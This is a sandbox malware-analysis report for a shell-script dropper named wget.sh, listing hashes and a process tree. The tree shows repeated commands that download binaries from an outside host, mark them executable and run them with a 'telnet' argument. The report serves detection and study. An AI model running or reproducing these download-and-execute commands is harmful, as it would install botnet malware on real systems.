Analysis
-
max time kernel
3s -
max time network
4s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18-12-2024 13:17
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
676B
-
MD5
5b3ceaec7a3ad11b45f5fca1b603d939
-
SHA1
5e5ee3fa232288f77e670c66d8ca42c0cc171e45
-
SHA256
bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa
-
SHA512
47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 692 chmod 696 chmod 702 chmod 671 chmod 677 chmod 688 chmod 705 chmod 660 chmod 682 chmod 699 chmod
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵PID:648
-
/usr/bin/wgetwget http://stop.eye-network.ru/wkb862⤵PID:650
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:660
-
-
/tmp/wkb86./wkb86 telnet2⤵PID:663
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/kqibeps2⤵PID:665
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:671
-
-
/tmp/kqibeps./kqibeps telnet2⤵PID:673
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/bojwsl2⤵PID:674
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/bojwsl./bojwsl telnet2⤵PID:678
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/njvwa42⤵PID:679
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/njvwa4./njvwa4 telnet2⤵PID:683
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/ngwa52⤵PID:684
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/ngwa5./ngwa5 telnet2⤵PID:689
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/woega62⤵PID:690
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/woega6./woega6 telnet2⤵PID:693
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/fnkea72⤵PID:694
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/fnkea7./fnkea7 telnet2⤵PID:697
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/gnjqwpc2⤵PID:698
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/gnjqwpc./gnjqwpc telnet2⤵PID:700
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/wlw68k2⤵PID:701
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/wlw68k./wlw68k telnet2⤵PID:703
-
-
/usr/bin/wgetwget http://stop.eye-network.ru/wrjkngh42⤵PID:704
-
-
/bin/chmodchmod +x systemd-private-c282207c8dc74748a57aada698a482f6-systemd-timedated.service-g7cP0M wget.sh2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/wrjkngh4./wrjkngh4 telnet2⤵PID:706
-